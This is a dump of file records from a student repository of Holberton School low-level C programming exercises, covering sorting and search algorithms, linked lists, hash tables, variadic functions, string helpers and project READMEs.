NULL)\n\t{\n\t\tfree(index_arr);\n\t\treturn;\n\t}\n\tfor (i = 0; i < size; i++)\n\t{\n\t\tnum = array[i];\n\t\tidx = index_arr[array[i]] - 1;\n\t\tindex_arr[array[i]] -= 1;\n\t\taux_arr[idx] = num;\n\t}\n\tfor (i = 0; i < size; i++)\n\t{\n\t\tarray[i] = aux_arr[i];\n\t}\n\tfree(index_arr);\n\tfree(aux_arr);\n}\n" }, { "alpha_fraction": 0.8072289228439331, "alphanum_fraction": 0.8072289228439331, "avg_line_length": 82, "blob_id": "e894c32a9a923bc51deb2300617391bc70451d8b", "content_id": "2341129c2baaa6faaa287974af0edad6978621a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 83, "license_type": "no_license", "max_line_length": 82, "num_lines": 1, "path": "/0x09-static_libraries/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository is about static and dynamic libraries, how to create and use them.\n" }, { "alpha_fraction": 0.5467255115509033, "alphanum_fraction": 0.5496688485145569, "avg_line_length": 13.612903594970703, "blob_id": "b9e0d95b496c3f6984eef5b7ba0429f52d50929e", "content_id": "645003c6c70f5193b839b226e0a3d54053865394", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1359, "license_type": "no_license", "max_line_length": 49, "num_lines": 93, "path": "/0x10-variadic_functions/3-print_all.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdarg.h>\n#include <stdio.h>\n#include \"variadic_functions.h\"\n\n/**\n * print_all - function that prints anything.\n * @format: formats numbers given.\n */\n\nvoid print_all(const char * const format, ...)\n{\n\tprfor_t form_get[] = {\n\t\t{\"c\", print_char},\n\t\t{\"i\", print_integer},\n\t\t{\"f\", print_float},\n\t\t{\"s\", print_string},\n\t\t{NULL, NULL}\n\t};\n\tint i, j;\n\tva_list argu;\n\tchar *s = \"\";\n\n\tva_start(argu, format);\n\ti = 0;\n\n\twhile (format != NULL && format[i])\n\t{\n\t\tj = 0;\n\t\twhile (j < 4)\n\t\t{\n\t\t\tif (form_get[j].form[0] == format[i])\n\t\t\t{\n\t\t\t\tprintf(\"%s\", s);\n\t\t\t\t(form_get[j].f(argu));\n\t\t\t\ts = \", \";\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tj++;\n\t\t}\n\t\ti++;\n\t}\n\tprintf(\"\\n\");\n\tva_end(argu);\n}\n/**\n * print_char - function that prints characters.\n * @va: arguments.\n */\nvoid print_char(va_list va)\n{\n\tint c;\n\n\tc = va_arg(va, int);\n\tprintf(\"%c\", c);\n}\n/**\n * print_integer - function that prints integers.\n * @va: arguments.\n */\nvoid print_integer(va_list va)\n{\n\tint i;\n\n\ti = va_arg(va, int);\n\tprintf(\"%d\", i);\n}\n/**\n * print_float - function that prints floats.\n * @va: arguments.\n */\nvoid print_float(va_list va)\n{\n\tdouble f;\n\n\tf = va_arg(va, double);\n\tprintf(\"%f\", f);\n}\n/**\n * print_string - function that prints stings.\n * @va: arguments.\n */\nvoid print_string(va_list va)\n{\n\tchar *s;\n\n\ts = va_arg(va, char *);\n\tif (s == NULL)\n\t{\n\t\tprintf(\"(nil)\");\n\t\treturn;\n\t}\n\tprintf(\"%s\", s);\n}\n" }, { "alpha_fraction": 0.6462196707725525, "alphanum_fraction": 0.6476462483406067, "avg_line_length": 23.172412872314453, "blob_id": "38281340d4b061d33a1046edde2d38d7e0e2130e", "content_id": "b15065646bdabd21827f28401965f3db9cf837db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 703, "license_type": "no_license", "max_line_length": 74, "num_lines": 29, "path": "/0x1A-hash_tables/4-hash_table_get.c", "repo_name": 
"david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"hash_tables.h\"\n\n/**\n * hash_table_get - function that retrieves a value associated with a key.\n * @ht: hash table to look into.\n * @key: key value which is been looked.\n * Return: the value associated with the element, or NULL if key couldn’t\n * be found.\n */\n\nchar *hash_table_get(const hash_table_t *ht, const char *key)\n{\n\thash_node_t *cursor;\n\tunsigned long int index;\n\n\tif (ht == NULL || key == NULL)\n\t\treturn (NULL);\n\n\tindex = key_index((const unsigned char *)key, ht->size);\n\n\tif (ht->array[index] == NULL)\n\t\treturn (NULL);\n\tfor (cursor = ht->array[index]; cursor != NULL; cursor = cursor->next)\n\t{\n\t\tif (strcmp(key, cursor->key) == 0)\n\t\t\treturn (cursor->value);\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.5320512652397156, "alphanum_fraction": 0.5448718070983887, "avg_line_length": 15.714285850524902, "blob_id": "06becb9ce5e6d84890b0f51246fc2bca45f2a98d", "content_id": "b969bff0a021b01125217f6b492254a6fffb59db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 468, "license_type": "no_license", "max_line_length": 43, "num_lines": 28, "path": "/0x06-pointers_arrays_strings/0-strcat.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * _strcat - concatenate two strings\n * @dest: first string input to be changed.\n * @src: string to be added.\n * Return: pointer to the dest string.\n */\nchar *_strcat(char *dest, char *src)\n{\n\tint i = 0, j = 0;\n\n\t/*count first string*/\n\twhile (dest[i] != '\\0')\n\t{\n\t\ti++;\n\t}\n\t/*add second string to the first*/\n\twhile (src[j] != '\\0')\n\t{\n\t\tdest[i] = src[j];\n\t\ti++;\n\t\tj++;\n\t}\n\t/* add '\\0' at the end */\n\tdest[i] = '\\0';\n\treturn (&(*dest));\n}\n" }, { "alpha_fraction": 0.7684210538864136, "alphanum_fraction": 0.7684210538864136, "avg_line_length": 20.22222137451172, "blob_id": "2d074d8d9a1c436ece6e7f81ae1b80ee14f0044b", "content_id": "7acc5f340f9558e0b163ba6506646708592ed9b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 190, "license_type": "no_license", "max_line_length": 71, "num_lines": 9, "path": "/0x01-variables_if_else_while/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This project is about the if and else statements and the use of loops,\nwe will find diferent types of programns, also the use of operators and\nvariables.\n\nif\nif... else\nwhile\ndo... 
while\nfor" }, { "alpha_fraction": 0.5512820482254028, "alphanum_fraction": 0.5641025900840759, "avg_line_length": 13.625, "blob_id": "27c27e9c035e51c61b49523529b46a38cb371f18", "content_id": "ddc4eeb8ba612a46c6987e704274eb3977870844", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 234, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/0x04-more_functions_nested_loops/6-print_line.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_line - Prints the numbers to 14.\n * @n: variable to strore input value.\n */\n\nvoid print_line(int n)\n{\n\tchar a = '_', iter;\n\n\tfor (iter = 0; iter < n; iter++)\n\t{\n\t\t_putchar(a);\n\t}\n\t_putchar('\\n');\n}\n" }, { "alpha_fraction": 0.6955810189247131, "alphanum_fraction": 0.6955810189247131, "avg_line_length": 23.440000534057617, "blob_id": "43b6a56705fd998c25ef8fd3eb995fd116b06d53", "content_id": "a7c03e49ae9c025b599f96b412cc76f9f8b7407d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 611, "license_type": "no_license", "max_line_length": 69, "num_lines": 25, "path": "/0x10-variadic_functions/variadic_functions.h", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#ifndef VARIADIC_FUNCTIONS_H\n#define VARIADIC_FUNCTIONS_H\n#include <stdarg.h>\n\n/**\n * struct prfor - Struct prfor\n *\n * @form: The format type.\n * @f: The function associated.\n */\ntypedef struct prfor\n{\n\tchar *form;\n\tvoid (*f)(va_list);\n} prfor_t;\n\nint sum_them_all(const unsigned int n, ...);\nvoid print_numbers(const char *separator, const unsigned int n, ...);\nvoid print_strings(const char *separator, const unsigned int n, ...);\nvoid print_all(const char * const format, ...);\nvoid print_char(va_list va);\nvoid print_integer(va_list va);\nvoid print_float(va_list va);\nvoid print_string(va_list va);\n#endif\n" }, { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 38, "blob_id": "64b2e20edfe6b50122542760476e8e1af054c1a7", "content_id": "425949ef4035a8dc27c40dba510c3f7983a452e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 156, "license_type": "no_license", "max_line_length": 84, "num_lines": 4, "path": "/0x0E-structures_typedef/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository contain files for the project about learning Structures and Typedef.\n\nWhat are structures, when, why and how to use them\nHow to use typedef\n" }, { "alpha_fraction": 0.5801216959953308, "alphanum_fraction": 0.5851926803588867, "avg_line_length": 21.409090042114258, "blob_id": "d709fd8fbc624ace609c11defbf1391428fd6d4c", "content_id": "73907f7fac4a63a2938c164f38c87025faec06da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 986, "license_type": "no_license", "max_line_length": 77, "num_lines": 44, "path": "/0x13-more_singly_linked_lists/9-insert_nodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * insert_nodeint_at_index - inserts a new node at a given position.\n * @head: pointer to first node.\n * @idx: given node index.\n * @n: data to store in the new node.\n * Return: return the 
address of the new node, or NULL if it failed or\n * if it is not possible to add the new node at index idx.\n */\nlistint_t *insert_nodeint_at_index(listint_t **head, unsigned int idx, int n)\n{\n\tlistint_t *new;\n\tlistint_t *cursor;\n\tunsigned int i;\n\n\tif (head == NULL)\n\t\treturn (NULL);\n\tcursor = *head;\n\tif (idx == 0)\n\t{\n\t\tnew = malloc(sizeof(listint_t));\n\t\tif (new == NULL)\n\t\t\treturn (NULL);\n\t\tnew->n = n;\n\t\tnew->next = *head;\n\t\t*head = new;\n\t\treturn (new);\n\t}\n\tfor (i = 0; cursor != NULL; i++)\n\t{\n\t\tif (i == (idx - 1))\n\t\t{\n\t\t\tnew = malloc(sizeof(listint_t));\n\t\t\tif (new == NULL)\n\t\t\t\treturn (NULL);\n\t\t\tnew->n = n;\n\t\t\tnew->next = cursor->next;\n\t\t\tcursor->next = new;\n\t\t\treturn (new);\n\t\t}\n\t\tcursor = cursor->next;\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.5387205481529236, "alphanum_fraction": 0.5471380352973938, "avg_line_length": 15.5, "blob_id": "658477aa4c540afea317d277d8cebbb90f9ed88a", "content_id": "2f528bee7dd08be2a9a11d83847e0b8d9e19cb40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 594, "license_type": "no_license", "max_line_length": 65, "num_lines": 36, "path": "/0x1B-sorting_algorithms/2-selection_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * selection_sort - sorts an array using the selection sort algorithm\n * @array: array to sort\n * @size: size of array\n * Return: Nothing\n */\nvoid selection_sort(int *array, size_t size)\n{\n\tsize_t j, cont = 0, pos;\n\tint aux, flag = 0, value;\n\n\twhile (cont < size)\n\t{\n\t\tpos = cont;\n\t\tvalue = array[cont];\n\t\tfor (j = cont; j < size; j++)\n\t\t{\n\t\t\tif (value > array[j])\n\t\t\t{\n\t\t\t\tflag = 1;\n\t\t\t\tvalue = array[j];\n\t\t\t\tpos = j;\n\t\t\t}\n\t\t}\n\t\tif (flag == 1)\n\t\t{\n\t\t\taux = array[cont];\n\t\t\tarray[cont] = value;\n\t\t\tarray[pos] = aux;\n\t\t\tprint_array(array, size);\n\t\t}\n\t\tcont++;\n\t\tflag = 0;\n\t}\n}\n" }, { "alpha_fraction": 0.5565410256385803, "alphanum_fraction": 0.567627489566803, "avg_line_length": 18.60869598388672, "blob_id": "aa632ef0a9a426cd36dd796e65d3884e1e37bb7f", "content_id": "93adb8c0a511f67431d487ed003db5e41b250810", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 902, "license_type": "no_license", "max_line_length": 73, "num_lines": 46, "path": "/0x17-doubly_linked_lists/8-delete_dnodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * delete_dnodeint_at_index - deletes the node at index of a linked list.\n * @head: pointer to first node.\n * @index: given node index.\n * Return: 1 if it succeeded or -1 if it failed.\n */\nint delete_dnodeint_at_index(dlistint_t **head, unsigned int index)\n{\n\tdlistint_t *temp;\n\tdlistint_t *cursor;\n\tunsigned int i;\n\n\tif (head == NULL)\n\t\treturn (-1);\n\tcursor = *head;\n\tfor (i = 0; cursor != NULL; i++, cursor = cursor->next)\n\t{\n\t\tif (index == 0)\n\t\t{\n\t\t\ttemp = *head;\n\t\t\t*head = temp->next;\n\t\t\tif (temp->next != NULL)\n\t\t\t\ttemp->next->prev = NULL;\n\t\t\tfree(temp);\n\t\t\treturn (1);\n\t\t}\n\t\tif (i == (index - 1))\n\t\t{\n\t\t\tif (cursor->next == NULL)\n\t\t\t\tbreak;\n\t\t\ttemp = cursor->next;\n\t\t\tif (temp->next == NULL)\n\t\t\t{\n\t\t\t\tcursor->next = 
NULL;\n\t\t\t\tfree(temp);\n\t\t\t\treturn (1);\n\t\t\t}\n\t\t\tcursor->next = temp->next;\n\t\t\ttemp->next->prev = cursor;\n\t\t\tfree(temp);\n\t\t\treturn (1);\n\t\t}\n\t}\n\treturn (-1);\n}\n" }, { "alpha_fraction": 0.5066666603088379, "alphanum_fraction": 0.5360000133514404, "avg_line_length": 12.392857551574707, "blob_id": "080194fdc77eb73e8efd399ec6fca985953a5bdd", "content_id": "e888e587f1b71a88738f9b6ad9bd268eea88a70d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 375, "license_type": "no_license", "max_line_length": 39, "num_lines": 28, "path": "/0x05-pointers_arrays_strings/101-keygen.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n/**\n * main - generates a random password.\n *\n *\n * Return: always 0.\n */\n\nint main(void)\n{\n\tint num = 2772, var = 0, sum = 0, ran;\n\n\ttime_t t;\n\n\tsrand((unsigned) time(&t));\n\n\twhile (var < num)\n\t{\n\t\tran = rand() % 128;\n\t\tvar = var + ran;\n\t\tprintf(\"%c\", ran);\n\t\tsum = sum + ran;\n\t}\n\tprintf(\"%c\", (num - sum));\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.6265860795974731, "alphanum_fraction": 0.6308156847953796, "avg_line_length": 19.702381134033203, "blob_id": "34693cf60eba1d4099d02ef3245cf82314617b50", "content_id": "8001f533811caf3aacb

a08d3d4c\u200b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1655, "license_type": "no_license", "max_line_length": 78, "num_lines": 84, "path": "/0x1B-sorting_algorithms/107-quick_sort_hoare.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n\n/**\n * swap - swaps two positions of an array and prints the array\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n */\nvoid swap(int *array, int first, int last, size_t size)\n{\n\tint aux, value;\n\n\tvalue = array[first];\n\taux = array[last];\n\tarray[last] = value;\n\tarray[first] = aux;\n\tprint_array(array, size);\n}\n/**\n * part_hoare - finds the partition position (pivot) of the array\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n * Return: pivot index\n */\nint part_hoare(int *array, int first, int last, size_t size)\n{\n\tint pivot = array[last];\n\tint i = first - 1;\n\tint j = last + 1;\n\n\twhile (1)\n\t{\n\t\tdo {\n\t\t\ti++;\n\t\t} while (array[i] < pivot);\n\n\t\tdo {\n\t\t\tj--;\n\t\t} while (array[j] > pivot);\n\n\t\tif (i > j)\n\t\t\treturn (j);\n\t\tif (array[i] > array[j])\n\t\t\tswap(array, i, j, size);\n\t}\n}\n\n/**\n * sorting_hoare - sorts an array of integers in ascending order\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n */\nvoid sorting_hoare(int *array, int first, int last, size_t size)\n{\n\tint pivot;\n\n\tif (first < last)\n\t{\n\t\tpivot = part_hoare(array, first, last, size);\n\t\tsorting_hoare(array, first, pivot, size);\n\t\tsorting_hoare(array, pivot + 1, last, size);\n\t}\n}\n\n/**\n * quick_sort_hoare - sorts an array of integers in ascending order using the\n * Quick sort algorithm\n * @array: array to sort\n * @size: size of array\n */\nvoid quick_sort_hoare(int *array, size_t size)\n{\n\tint last = size - 1;\n\n\tif (!array || size < 2)\n\t\treturn;\n\n\tsorting_hoare(array, 0, last, 
size);\n}\n" }, { "alpha_fraction": 0.617977499961853, "alphanum_fraction": 0.617977499961853, "avg_line_length": 11.714285850524902, "blob_id": "802600a63d988a74e0483d3c8fca67574b7dee07", "content_id": "7c5f2a3d3a6102465227f799846ec254466a844a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 89, "license_type": "no_license", "max_line_length": 28, "num_lines": 7, "path": "/0x0D-preprocessor/101-preprocessor_abuse.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#define s \"Hello, Holberton\"\n\nvoid main(void)\n{\n\tprintf(\"%s\\n\", s);\n}\n" }, { "alpha_fraction": 0.607594907283783, "alphanum_fraction": 0.6103073954582214, "avg_line_length": 27, "blob_id": "05ad300e0771ac030b0b2f30668e7214fcd1fd9e", "content_id": "ccbd599dcb2806ebc1a782dcb548bfab18b6f32b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2212, "license_type": "no_license", "max_line_length": 79, "num_lines": 79, "path": "/0x1E-search_algorithms/105-jump_list.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"search_algos.h\"\n#include <math.h>\n\n/**\n * linear_mod - function that searches for a value in an linked list\n * using the Linear search algorithm\n * @start_n: a pointer to the first node\n * @start: initial index\n * @end: final index\n * @value: is the value to search for\n * Return: pointer to the first node where value is located or NULL if value\n * is not present in head or if head is NULL.\n */\n\nlistint_t *linear_mod(listint_t *start_n, size_t start, size_t end, int value)\n{\n\tsize_t i;\n\n\tif (start_n == NULL)\n\t\treturn (NULL);\n\n\tfor (i = start; i <= end; i++, start_n = start_n->next)\n\t{\n\t\tprintf(\"Value checked at index [%d] = [%d]\\n\", (int) i, start_n->n);\n\t\tif (start_n->n == value)\n\t\t\treturn (start_n);\n\t}\n\treturn (NULL);\n}\n\n/**\n * jump_list - function that searches for a value in a sorted list of\n * integers using the Jump search algorithm.\n * @list: pointer to the head of the list to search in\n * @size: the number of nodes in list\n * @value: is the value to search for\n * Return: pointer to the first node where value is located or NULL if value\n * is not present in head or if head is NULL.\n */\nlistint_t *jump_list(listint_t *list, size_t size, int value)\n{\n\tsize_t start, end, block_s;\n\tlistint_t *end_n, *start_n;\n\n\tblock_s = sqrt(size);\n\n\tif (list == NULL)\n\t\treturn (NULL);\n\n\tfor (end_n = list, start_n = list; end_n->index != block_s;\n\t end_n = end_n->next)\n\t\t;\n\tfor (start = 0, end = block_s; end < size && end_n->next;)\n\t{\n\t\tprintf(\"Value checked at index [%d] = [%d]\\n\", (int) end, end_n->n);\n\t\tif (start_n->n > value && start == 0)\n\t\t\treturn (NULL);\n\t\telse if (end_n->n >= value)\n\t\t\tbreak;\n\t\tfor (end += block_s; end_n->index != end && end_n->next; end_n = end_n->next)\n\t\t{\n\t\t\tstart_n = start_n->next;\n\t\t\tstart = end - block_s;\n\t\t}\n\t}\n\n\tif (end >= size - 1)\n\t{\n\t\tstart_n = start_n->next;\n\t\tprintf(\"Value checked at index [%d] = [%d]\\n\", (int) (size - 1), end_n->n);\n\t\tprintf(\"Value found between indexes [%d] and [%d]\\n\", (int) start,\n\t\t (int) (size - 1));\n\t\treturn (linear_mod(start_n, start, size - 1, value));\n\t}\n\n\tprintf(\"Value found between indexes [%d] and [%d]\\n\", (int) (end - block_s),\n\t (int) (end));\n\treturn 
(linear_mod(start_n, start, end, value));\n}\n" }, { "alpha_fraction": 0.8045454621315002, "alphanum_fraction": 0.8045454621315002, "avg_line_length": 30.428571701049805, "blob_id": "ed5690f41bccd74a83b3478a7d95256255087bf6", "content_id": "10d2c2e0823c37e42f3e590694e4a07e2c5d0f00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 220, "license_type": "no_license", "max_line_length": 55, "num_lines": 7, "path": "/0x10-variadic_functions/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository is about Variadic Functions\n\nIt has different tasks in order to learn about this topic\n\nWhat are variadic functions\nHow to use va_start, va_arg and va_end macros\nWhy and how to use the const type qualifier\n" }, { "alpha_fraction": 0.6147859692573547, "alphanum_fraction": 0.6147859692573547, "avg_line_length": 14.117647171020508, "blob_id": "19bd6e2ad97d384d214babfb2847192f637d7b36", "content_id": "e82bdb5f7b152c37043059bace13332eb48d40c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 257, "license_type": "no_license", "max_line_length": 41, "num_lines": 17, "path": "/0x13-more_singly_linked_lists/4-free_listint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * free_listint - frees a listint_t list.\n * @head: pointer to first node.\n */\nvoid free_listint(listint_t *head)\n{\n\tlistint_t *cursor;\n\n\twhile (head != NULL)\n\t{\n\t\tcursor = head;\n\t\thead = head->next;\n\t\tfree(cursor);\n\t}\n\tfree(head);\n}\n" }, { "alpha_fraction": 0.4416666626930237, "alphanum_fraction": 0.510185182094574, "avg_line_length": 19.769229888916016, "blob_id": "5fc9c9acfbe0fa0beb0e259aef7d24cee95212a9", "content_id": "8ac4851c05361dccb317397f91f155c1d4075df0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1080, "license_type": "no_license", "max_line_length": 72, "num_lines": 52, "path": "/0x06-pointers_arrays_strings/102-infinite_add.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * infinite_add - adds two numbers\n * @n1: first number.\n * @n2: second number.\n * @r: buffer for the result.\n * @size_r: size of the r buffer.\n * Return: pointer to the result.\n */\nchar *infinite_add(char *n1, char *n2, char *r, int size_r)\n{\n\tint leng_1 = 0, leng_2 = 0, higher, carry = 0, add, add_1, add_2;\n\n\tfor (leng_1 = 0; n1[leng_1] != '\\0'; leng_1++)\n\t\t;\n\tfor (leng_2 = 0; n2[leng_2] != '\\0'; leng_2++)\n\t\t;\n\tif (leng_1 > leng_2)\n\t\thigher = leng_1;\n\telse\n\t\thigher = leng_2;\n\tif (size_r <= (higher + 1))\n\t\treturn (0);\n\tr[higher + 1] = '\\0';\n\tleng_1--, leng_2--, add_1 = n1[leng_1] - '0', add_2 = n2[leng_2] - '0';\n\twhile (higher >= 0)\n\t{\n\t\tadd = add_1 + add_2 + carry;\n\t\tif (add >= 10)\n\t\t\tcarry = add / 10;\n\t\telse\n\t\t\tcarry = 0;\n\t\tif (add > 0)\n\t\t\tr[higher] = (add % 10) + '0';\n\t\telse\n\t\t\tr[higher] = '0';\n\t\tif (leng_1 > 0)\n\t\t\tleng_1--, add_1 = n1[leng_1] - '0';\n\t\telse\n\t\t\tadd_1 = 0;\n\t\tif (leng_2 > 0)\n\t\t\tleng_2--, add_2 = n2[leng_2] - '0';\n\t\telse\n\t\t\tadd_2 = 0;\n\t\thigher--;\n\t}\n\tif (*(r) == '0')\n\t\treturn (r + 1);\n\telse\n\t\treturn (r);\n}\n" }, { "alpha_fraction": 0.7828282713890076, "alphanum_fraction": 
{ "alpha_fraction": 0.7828282713890076, "alphanum_fraction": 0.7828282713890076, "avg_line_length": 23.75, "blob_id": "df882a452108addb580a68acb495dd0bf27d6a04", "content_id": "f714fc4e1f88ced284c7249d6e9b5399a4d64038", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 198, "license_type": "no_license", "max_line_length": 73, "num_lines": 8, "path": "/0x13-more_singly_linked_lists/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### Singly linked lists\n\nThis repository is about singly linked lists\n\nGeneral learning purpose:\n\n- How to use linked lists\n- Start to look for the right source of information without too much help\n" }, { "alpha_fraction": 0.8108108043670654, "alphanum_fraction": 0.8108108043670654, "avg_line_length": 74, "blob_id": "ac5fef8cc794e40b150fc5c727eb0e94e6020f96", "content_id": "e095eb5f63f5168205bd19f3bbad460abcf0125f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 74, "license_type": "no_license", "max_line_length": 79, "num_lines": 1, "path": "/0x07-pointers_arrays_strings/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This is a project about functions of C libraries, using pointers and arrays." }, { "alpha_fraction": 0.33142855763435364, "alphanum_fraction": 0.37142857909202576, "avg_line_length": 13.125, "blob_id": "025f4da0f94117df8f0fee5779ce0ddd4a03c0a0", "content_id": "8d17189ee220a4a4bfca86d44f34af1c06e18002", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 525, "license_type": "no_license", "max_line_length": 58, "num_lines": 40, "path": "/0x02-functions_nested_loops/9-times_table.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * times_table - prints the 9 times table, starting with 0\n *\n *\n */\n\nvoid times_table(void)\n{\n\tint r, m, d, fd;\n\n\tfor (m = 0; m <= 9; m++)\n\t{\n\t\tfor (d = 0; d <= 9; d++)\n\t\t{\n\t\t\tr = m * d;\n\t\t\tif (r < 10)\n\t\t\t{\n\t\t\t\tif (!(d == 0))\n\t\t\t\t{\n\t\t\t\t\t_putchar(' ');\n\t\t\t\t}\n\t\t\t\t_putchar('0' + r);\n\t\t\t}\n\t\t\telse if (r >= 10)\n\t\t\t{\n\t\t\t\tfd = (r / 10) % 10;\n\t\t\t\tr = r % 10;\n\t\t\t\t_putchar('0' + fd);\n\t\t\t\t_putchar('0' + r);\n\t\t\t}\n\t\t\tif (!(d == 9))\n\t\t\t{\n\t\t\t\t_putchar(',');\n\t\t\t\t_putchar(' ');\n\t\t\t}\n\t\t}\n\t\t_putchar('\\n');\n\t}\n}\n" }, { "alpha_fraction": 0.7569526433944702, "alphanum_fraction": 0.7830777168273926, "avg_line_length": 136.97674560546875, "blob_id": "9481be973f8ade0369e5cae1b9add10e93c40924", "content_id": "e4fc0be5f3f0f83f2cc4c519394991da5359732a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5933, "license_type": "no_license", "max_line_length": 292, "num_lines": 43, "path": "/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "# Low-level Programming\n\nThis is the Low-level Programming module, created during the Full Stack Software Engineering program at Holberton School. This module aims to understand how programming languages and Unix systems work, basically **what is going on under the hood**, with a strong focus on developing algorithms.\n\n## Technologies:\n\n- **C Programming** C90 Standard\n- **Bash scripts**\n- Tested on **Ubuntu 14.04 LTS**\n- Compiler **gcc 
4.8.4**\n\n## Projects:\n\n| Project name | Description |\n| ------------ | ----------- |\n| [`0x00-hello_world`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x00-hello_world) | Introduction to C Programming Language and compiling basics with gcc |\n| [`0x01-variables_if_else_while`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x01-variables_if_else_while) | Loops and Conditions |\n| [`0x02-functions_nested_loops`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x02-functions_nested_loops) | Function prototypes and nested loops in **C** |\n| [`0x03-debugging`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x03-debugging) | Code Debugging Challenge |\n| [`0x04-more_functions_nested_loops`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x04-more_functions_nested_loops) | Nested Loops and basic algorithms |\n| [`0x05-pointers_arrays_strings`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x05-pointers_arrays_strings) | Pointers data type, Array and String, declaration and handling |\n| [`0x06-pointers_arrays_strings`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x06-pointers_arrays_strings) | Pointers data type, Array and String, declaration and handling |\n| [`0x07-pointers_arrays_strings`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x07-pointers_arrays_strings) | Pointers data type, Array and String, declaration and handling |\n| [`0x08-recursion`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x08-recursion) | Algorithms with recursion functions |\n| [`0x09-static_libraries`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x09-static_libraries) | Using static libraries, creating, compiling and using in **C** |\n| [`0x0A-argc_argv`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0A-argc_argv) | Argument count and argument vector, command line features |\n| [`0x0B-malloc_free`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0B-malloc_free) | Dynamic Memory allocation, using malloc in C |\n| 